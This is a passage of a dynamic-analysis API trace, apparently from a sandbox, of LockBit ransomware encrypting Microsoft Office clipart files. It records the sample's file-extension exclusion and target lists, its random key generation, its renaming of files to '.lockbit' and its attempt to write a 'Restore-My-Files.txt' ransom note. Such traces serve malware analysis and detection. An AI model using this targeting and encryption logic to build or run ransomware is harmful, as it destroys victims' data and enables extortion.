lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0163.032] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0163.032] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0163.032] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0163.032] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0163.032] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0163.032] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0163.032] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0163.032] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0163.032] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0163.032] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0163.032] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0163.032] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0163.032] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0163.032] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0163.032] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0163.032] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0163.032] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0163.032] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0163.032] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0163.032] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0163.033] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0163.033] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA01849_.WMF") returned 1 [0163.033] lstrcmpiW (lpString1="ntldr", lpString2="NA01849_.WMF") returned 1 [0163.033] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA01849_.WMF") returned 1 [0163.033] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA01849_.WMF") returned -1 [0163.033] lstrcmpiW (lpString1="autorun.inf", lpString2="NA01849_.WMF") returned -1 [0163.033] lstrcmpiW (lpString1="thumbs.db", lpString2="NA01849_.WMF") returned 1 [0163.033] lstrcmpiW (lpString1="iconcache.db", lpString2="NA01849_.WMF") returned -1 [0163.033] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0163.033] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01849_.WMF") returned=".WMF" [0163.033] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0163.033] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0163.033] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0163.033] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0163.033] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0163.033] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0163.033] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0163.033] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0163.033] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0163.033] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0163.033] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0163.033] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0163.033] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0163.033] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0163.033] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0163.034] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0163.034] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0163.034] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0163.034] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0163.034] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0163.034] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0163.034] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0163.034] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0163.034] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0163.034] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0163.034] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0163.034] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0163.034] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0163.034] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01849_.WMF.lockbit") returned 72 [0163.034] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01849_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01849_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0163.037] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0163.038] malloc (_Size=0x40068) returned 0x3df0008 [0163.038] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=624) returned 1 [0163.038] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.038] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.038] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0163.038] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.039] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.039] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0163.039] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0163.040] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01849_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01849_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.040] malloc (_Size=0xa6) returned 0x1fa2ed8 [0163.040] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0163.044] free (_Block=0x1fa2ed8) [0163.044] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01849_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0163.044] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0163.044] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0163.044] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a04ab00, ftCreationTime.dwHighDateTime=0x1bd4bfd, ftLastAccessTime.dwLowDateTime=0x6a396cf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2a04ab00, ftLastWriteTime.dwHighDateTime=0x1bd4bfd, nFileSizeHigh=0x0, nFileSizeLow=0x1138, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA01852_.WMF", cAlternateFileName="")) returned 1 [0163.044] lstrcmpiW (lpString1=".", lpString2="NA01852_.WMF") returned -1 [0163.044] lstrcmpiW (lpString1="..", lpString2="NA01852_.WMF") returned -1 [0163.044] PathFindExtensionW (pszPath="NA01852_.WMF") returned=".WMF" [0163.044] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0163.044] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0163.044] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0163.044] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0163.044] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0163.044] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0163.045] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0163.045] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0163.045] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0163.045] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0163.045] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0163.045] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0163.045] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0163.045] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0163.045] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0163.045] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0163.045] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0163.045] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0163.045] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0163.045] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0163.045] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0163.045] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0163.045] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0163.045] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0163.045] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0163.045] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0163.045] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0163.046] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0163.046] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0163.046] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0163.046] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0163.046] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0163.046] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0163.046] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0163.046] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0163.046] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0163.046] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0163.046] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0163.046] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0163.046] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0163.046] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0163.046] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0163.046] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0163.046] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0163.046] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0163.046] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0163.046] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0163.046] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA01852_.WMF") returned 1 [0163.046] lstrcmpiW (lpString1="ntldr", lpString2="NA01852_.WMF") returned 1 [0163.047] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA01852_.WMF") returned 1 [0163.047] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA01852_.WMF") returned -1 [0163.047] lstrcmpiW (lpString1="autorun.inf", lpString2="NA01852_.WMF") returned -1 [0163.047] lstrcmpiW (lpString1="thumbs.db", lpString2="NA01852_.WMF") returned 1 [0163.047] lstrcmpiW (lpString1="iconcache.db", lpString2="NA01852_.WMF") returned -1 [0163.047] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0163.047] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01852_.WMF") returned=".WMF" [0163.047] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0163.047] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0163.047] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0163.047] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0163.047] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0163.047] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0163.047] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0163.047] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0163.047] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0163.047] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0163.047] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0163.047] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0163.047] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0163.047] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0163.048] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0163.048] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0163.048] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0163.048] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0163.048] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0163.048] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0163.048] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0163.048] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0163.048] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0163.048] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0163.048] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0163.048] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0163.048] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0163.048] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0163.048] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01852_.WMF.lockbit") returned 72 [0163.048] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01852_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01852_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0163.049] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0163.049] malloc (_Size=0x40068) returned 0x3f70048 [0163.050] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=4408) returned 1 [0163.050] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.050] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.050] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0163.050] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.051] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.051] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0163.051] ReadFile (in: hFile=0x2a4, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0163.055] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01852_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01852_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.055] malloc (_Size=0xa6) returned 0x1fa2ed8 [0163.055] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0163.056] free (_Block=0x1fa2ed8) [0163.057] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01852_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0163.057] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0163.057] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0163.057] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6a396cf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x10c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA01858_.WMF", cAlternateFileName="")) returned 1 [0163.057] lstrcmpiW (lpString1=".", lpString2="NA01858_.WMF") returned -1 [0163.057] lstrcmpiW (lpString1="..", lpString2="NA01858_.WMF") returned -1 [0163.057] PathFindExtensionW (pszPath="NA01858_.WMF") returned=".WMF" [0163.057] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0163.057] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0163.057] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0163.057] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0163.057] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0163.057] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0163.057] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0163.057] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0163.057] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0163.057] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0163.057] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0163.058] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0163.058] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0163.058] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0163.058] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0163.058] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0163.058] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0163.058] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0163.058] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0163.058] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0163.058] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0163.058] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0163.058] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0163.058] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0163.058] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0163.058] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0163.058] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0163.058] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0163.058] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0163.058] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0163.058] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0163.058] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0163.058] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0163.058] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0163.058] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0163.058] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0163.059] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0163.059] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0163.059] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0163.059] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0163.059] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0163.059] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0163.059] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0163.059] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0163.059] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0163.059] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0163.059] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0163.059] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA01858_.WMF") returned 1 [0163.059] lstrcmpiW (lpString1="ntldr", lpString2="NA01858_.WMF") returned 1 [0163.059] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA01858_.WMF") returned 1 [0163.059] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA01858_.WMF") returned -1 [0163.059] lstrcmpiW (lpString1="autorun.inf", lpString2="NA01858_.WMF") returned -1 [0163.059] lstrcmpiW (lpString1="thumbs.db", lpString2="NA01858_.WMF") returned 1 [0163.059] lstrcmpiW (lpString1="iconcache.db", lpString2="NA01858_.WMF") returned -1 [0163.059] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0163.059] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01858_.WMF") returned=".WMF" [0163.059] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0163.059] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0163.059] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0163.059] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0163.060] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0163.060] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0163.060] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0163.060] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0163.060] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0163.060] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0163.060] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0163.060] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0163.060] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0163.060] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0163.060] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0163.060] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0163.060] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0163.060] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0163.060] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0163.060] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0163.060] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0163.060] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0163.060] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0163.060] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0163.060] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0163.060] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0163.060] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0163.060] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0163.060] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01858_.WMF.lockbit") returned 72 [0163.061] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01858_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01858_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0163.062] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0163.062] malloc (_Size=0x40068) returned 0x3d70450 [0163.062] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=4296) returned 1 [0163.062] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.063] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.063] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0163.063] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.063] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.063] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0163.063] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0163.068] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program 